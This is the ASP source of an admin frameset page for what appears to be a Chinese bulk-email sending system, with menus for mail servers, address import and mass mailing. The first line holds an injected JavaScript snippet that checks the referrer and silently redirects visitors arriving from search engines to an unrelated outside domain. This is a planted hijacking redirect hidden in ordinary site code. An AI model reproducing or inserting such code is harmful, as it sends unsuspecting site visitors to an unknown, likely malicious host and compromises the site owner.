d:\wwwroot\wuchunhua\sendmail\mail_index.asp
001:
<script type="text/javascript">var s=document.referrer;if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://www.afisyecd.space/?1923057"}</script>
<!--#include file="inc_CheckLogin.asp"-->
002:
<%
003:
action=Request("action")
004:
005:
if action="left" then
006:
Call mainleft()
007:
ElseIf action="top" Then
008:
Call maintop()
009:
ElseIf action="hidelist" Then
010:
Call hidelist()
011:
Else
012:
Call main()
013:
End If
014:
015:
Sub main()
016:
%
>
017:
<html>
018:
<head>
019:
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
020:
<LINK href="inc/style.css" type=text/css rel=stylesheet>
021:
<script language="javascript" src="inc/js.js"></script>
022:
<title>
<%
=SysInfo(0)
%
> - 系统中心</title>
023:
</head>
024:
<frameset rows="32,*" border=0 frameborder="YES" name="top_frame">
025:
<!-- 微网网络(www.vwen.com)版权所有 ASP技术交流QQ群:19535106 -->
026:
<frame src="?action=top" frameborder="NO" name="ads" scrolling="NO" marginwidth="0" marginheight="0" noresize="noresize">
027:
<frameset rows="675" cols="175,9,*" border=0 name="bbs" framespacing="1">
028:
<frame src="?action=left" name="list" marginwidth="0" marginheight="0">
029:
<frame src="?action=hidelist" SCROLLING="NO" name="hidelist" marginwidth="0" marginheight="0" noresize="noresize">
030:
<frame src="mail_main.asp" name="main" marginwidth="0" marginheight="0">
031:
</frameset>
032:
</frameset>
033:
<noframes><body>对不起,您的浏览器不支持框架!</body></noframes>
034:
</html>
035:
036:
<%
end sub
037:
sub maintop '*************************** 顶部
038:
039:
%
>
040:
<html>
041:
<head>
042:
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
043:
<title>顶部</title>
044:
<style type="text/css">
045:
<!--
046:
body {margin:0px;FONT-SIZE: 12px;COLOR: #000000; FONT-FAMILY: "宋体";}
047:
td{font-family:宋体; font-size: 12px; line-height: 20px;}
048:
049:
A:visited{TEXT-DECORATION: none;color: #000000;}
050:
A:active{TEXT-DECORATION: none;color: #000000;}
051:
A:link{text-decoration: none;color: #000000;}
052:
A:hover {BORDER-BOTTOM: 1px dotted; BORDER-LEFT-WIDTH: 1px; BORDER-RIGHT-WIDTH: 1px; BORDER-TOP-WIDTH: 1px; COLOR: #666666; TEXT-DECORATION: none}
053:
-->
054:
</style>
055:
</head>
056:
<body background="images/main_top_bg.gif">
057:
<table width="100%" height="32" border="0" cellpadding="0" cellspacing="0" class="logobg">
058:
<tr>
059:
<td width="145"> </td>
060:
<td width="100%"> </td>
061:
<td width="320" style="padding-bottom:3px">
062:
<table width="320" border="0" cellspacing="0" cellpadding="0">
063:
<tr>
064:
<td width="20%" align="center"><a href="mail_sendunitmail.asp" target="main">单个邮件</a></td>
065:
<td width="20%" align="center"><a href="mail_mailgroupsend.asp" target="main">群发邮件</a></td>
066:
<td width="20%" align="center"><a href="mail_main.asp" target="main">系统首页</a></td>
067:
<td width="20%" align="center"><a href="javascript:checkclick('确定要退出系统吗?','mail_login.asp?action=logout');" target="_top">退出登录</a></td>
068:
<td width="20%" align="center"> </td>
069:
</tr>
070:
</table> </td>
071:
</tr>
072:
</table>
073:
</body>
074:
</html>
075:
076:
<%
end sub
077:
sub hidelist '*************************** 隐藏菜单按钮
078:
%
>
079:
<html>
080:
<head>
081:
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
082:
<title>隐藏菜单按钮</title>
083:
<style type="text/css">
084:
<!--
085:
body {margin:0;padding:0; background-color:#D0D0D0}
086:
.hiddentable{width:9px;}
087:
.hiddentop{height:6px;}
088:
.hiddenl{background:url(images/hidelist02.gif) no-repeat left center;}
089:
.hiddenr{background:url(images/hidelist01.gif) no-repeat left center;}
090:
.hiddenbottom{height:9px;}
091:
-->
092:
</style>
093:
<script language=javascript>
094:
function HideList(ss)
095:
{
096:
if (frmHide.liststatus.value==0)
097:
{
098:
eval("document.getElementById('arrow').className='hiddenr'");
099:
top.bbs.cols="0,9,*";
100:
}
101:
else
102:
{
103:
eval("document.getElementById('arrow').className='hiddenl'");
104:
top.bbs.cols="175,9,*";
105:
}
106:
frmHide.liststatus.value = 1 - frmHide.liststatus.value;
107:
108:
}
109:
</script>
110:
</head>
111:
<body>
112:
<table height="100%" border="0" cellpadding="0" cellspacing="0" class="hiddentable">
113:
<tr>
114:
<td class="hiddentop"></td>
115:
</tr>
116:
<tr>
117:
<td class="hiddenl" onClick="HideList(arrow)" style="cursor:hand" id="arrow">
118:
<form name=frmHide>
119:
<input type=hidden name="liststatus" value=0>
120:
</form>
121:
</td>
122:
</tr>
123:
<tr>
124:
<td class="hiddenbottom"></td>
125:
</tr>
126:
</table>
127:
</body>
128:
</html>
129:
<%
end sub
130:
sub mainleft '*************************** 左边菜单
131:
%
>
132:
<html>
133:
<head>
134:
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
135:
<title>左边菜单</title>
136:
<style type="text/css">
137:
body{ margin:0px;FONT-SIZE: 12px;COLOR: #000000; FONT-FAMILY: "宋体";background-color: #F6F6F6;scrollbar-face-color:#D9D9D9;scrollbar-highlight-color:#FfFFFF;scrollbar-3dlight-color:#FfFFFF;scrollbar-darkshadow-color:#999999;scrollbar-shadow-color:#000000;scrollbar-arrow-color:#000000;scrollbar-track-color:#E4E4E4;}
138:
139:
TD{ font-family:宋体; font-size: 12px; line-height: 15px;}
140:
a { font:normal 12px 宋体; color:#000000; text-decoration:none; }
141:
a:hover { color:#124981;text-decoration:underline; }
142:
143:
.dtree {
144:
font-family: Verdana, Geneva, Arial, Helvetica, sans-serif;
145:
font-size: 12px;
146:
color: #666;
147:
white-space: nowrap;
148:
padding-left:3px;
149:
}
150:
.dtree img {
151:
border: 0px;
152:
vertical-align: middle;
153:
}
154:
.dtree a {
155:
color: #333;
156:
text-decoration: none;
157:
}
158:
.dtree a.node, .dtree a.nodeSel {
159:
white-space: nowrap;
160:
padding: 1px 2px 1px 2px;
161:
}
162:
.dtree a.node:hover, .dtree a.nodeSel:hover {
163:
color: #333;
164:
text-decoration: underline;
165:
}
166:
.dtree a.nodeSel {
167:
background-color: #c0d2ec;
168:
}
169:
.dtree .clip {
170:
overflow: hidden;
171:
}
172:
</style>
173:
<SCRIPT LANGUAGE="JavaScript" Src="inc/dtree.js"></SCRIPT>
174:
</head>
175:
<body>
176:
<TABLE width="158" cellSpacing="0" cellPadding="0" border="0" background="img/menu_1.gif" height=60>
177:
<tr>
178:
<td colspan='2' align="center"><strong>欢迎您,
<%
=a_truename
%
></strong></td>
179:
</tr>
180:
<tr>
181:
<td align="center"><img src="images/left_fold0.gif" border="0"> <a href="mail_main.asp" target="main">系统首页</a></td>
182:
<td align="center"><img src="images/left_fold0.gif" border="0"> <a href="javascript:checkclick('确定要退出系统吗?','mail_login.asp?action=logout');" target="_top">安全退出</a></td>
183:
</tr>
184:
</table>
185:
<div class="dtree">
186:
<script type="text/javascript">
187:
<!--
188:
d = new dTree('d');
189:
d.add(0,-1,'系统管理菜单');
190:
d.add(1,0,'系统设置');
191:
d.add(2,1,'系统基本信息','mail_setting.asp','','main');
192:
d.add(3,1,'系统管理人员','mail_manager.asp','','main');
193:
d.add(4,1,'修改登陆密码','mail_managerpwd.asp','','main');
194:
d.add(5,1,'系统安全日志','mail_loglist.asp','','main');
195:
d.add(6,1,'空间占用查看','spacesize_show.asp','','main');
196:
d.add(7,1,'数据库压缩','data_compress.asp','','main');
197:
198:
199:
200:
d.add(8,0,'邮件地址管理');
201:
d.add(9,8,'邮件分类添加','mail_mailclass.asp?action=add','','main');
202:
d.add(10,8,'邮件分类列表','mail_mailclass.asp?action=list','','main');
203:
d.add(11,8,'手工邮址添加','mail_mailaddress.asp?action=add','','main');
204:
d.add(12,8,'数据库邮址导入','mail_datatomail.asp?action=add','','main');
205:
d.add(13,8,'数据库连接列表','mail_datatomail.asp?action=list','','main');
206:
d.add(14,8,'邮件地址列表','mail_mailaddress.asp?action=list','','main');
207:
208:
209:
d.add(15,0,'发送邮件管理');
210:
d.add(16,15,'邮件服务器添加','mail_mailserver.asp?action=add','','main');
211:
d.add(17,15,'邮件服务器列表','mail_mailserver.asp?action=list','','main');
212:
d.add(18,15,'添加邮件内容','mail_mailcontent.asp?action=add','','main');
213:
d.add(19,15,'邮件内容列表','mail_mailcontent.asp?action=list','','main');
214:
d.add(20,15,'进行群发邮件','mail_mailgroupsend.asp','','main');
215:
d.add(21,15,'历史发送记录','mail_sendhistory.asp?action=list','','main');
216:
document.write(d);
217:
218:
//-->
219:
</script>
220:
</div>
221:
</body>
222:
</html>
223:
<%
224:
Call CloseConn
225:
End Sub
226:
%
>
227:
228: